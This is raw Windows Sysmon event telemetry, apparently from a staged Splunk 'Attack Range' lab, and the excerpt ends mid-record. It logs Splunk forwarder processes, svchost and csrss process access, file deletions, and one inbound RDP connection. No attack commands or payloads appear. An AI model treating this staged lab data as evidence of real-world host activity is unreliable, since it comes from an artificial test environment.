07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.208{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:51.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DBAE405366D05CF7D93D0CEB809729F,SHA256=F252E2854B4FDB62CE480A5EBB4C1899EEC601DB627507ADC0A9F7C2693B29EE,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001048078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:43.752{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51004-false10.0.1.12-8000- 10341000x80000000000000001048077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.806{466BC892-F45B-60EB-1E7D-00000000CF01}99966404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.607{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.592{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=177E524B8B5392BBDBC55A47B4C9A99A,SHA256=62D084D3D21590AB226E8EE9202078CE962D346CA6C743DB96D7F652FD8B2255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:51.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B379E6521A8CDF3E4E171AC1575CCB30,SHA256=939182739A5EF34F24BBE1ECF501F8651AB18DC188700691B23FAAB175A13080,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:51.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA2A3D87FCC498E4A1862E14B62470BD,SHA256=EF4AF25EC464CD4F7E1EC833B639572A265425795BE493A4101F74DE2B2CFFA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:49.546{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-29730-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001048067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=014850D91F8C69BEAE80B855A07BB55D,SHA256=067A006DF47DB53D0442DFC2F73B461449768DC6E13E326C092E5F63A15865B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F34468D43B681C5D2673680BC5AAF85C,SHA256=34105B235A84E5A12A4261DB205008867BA77D582159CB0B5DCC10D5A5D290E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:52.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88FB3F624FFCBCB6D7E8CB105ABA3D70,SHA256=3EB22EC1F3D062C0043D92B895B56F69C6A1667B3E863CD0FECA09D8740F546E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.970{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.954{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=014850D91F8C69BEAE80B855A07BB55D,SHA256=067A006DF47DB53D0442DFC2F73B461449768DC6E13E326C092E5F63A15865B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.553{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC3FA91E2CAC9077F88A931D109EFE92,SHA256=2D26026E7CEE18B9F55F6B78192B286722AFAF00AC0412360A7F760D7E9774A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.273{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
